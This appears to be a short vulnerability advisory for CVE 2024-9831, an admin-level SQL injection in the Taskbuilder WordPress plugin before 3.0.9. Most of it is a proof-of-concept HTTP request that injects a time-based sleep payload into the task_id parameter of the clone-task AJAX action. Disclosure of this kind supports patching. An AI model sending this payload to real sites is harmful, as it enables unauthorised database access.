Taskbuilder < 3.0.9 – Admin+ SQL Injection | CVE 2024-9831

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks

Proof of Concept

When cloning a task, the `task_id` parameter is vulnerable to a time-based SQL injection:

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Content-Length: 495
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryg5V6SIBgL2fniBg2
Origin: https://example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://example.com/wp-admin/admin.php?page=wppm-tasks
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

------WebKitFormBoundaryg5V6SIBgL2fniBg2
Content-Disposition: form-data; name="task_name"

asdasddas
------WebKitFormBoundaryg5V6SIBgL2fniBg2
Content-Disposition: form-data; name="action"

wppm_set_clone_task
------WebKitFormBoundaryg5V6SIBgL2fniBg2
Content-Disposition: form-data; name="task_id"

(select*from(select(sleep(5)))a)
------WebKitFormBoundaryg5V6SIBgL2fniBg2
Content-Disposition: form-data; name="_ajax_nonce"

f1d9b4eaea
------WebKitFormBoundaryg5V6SIBgL2fniBg2--
```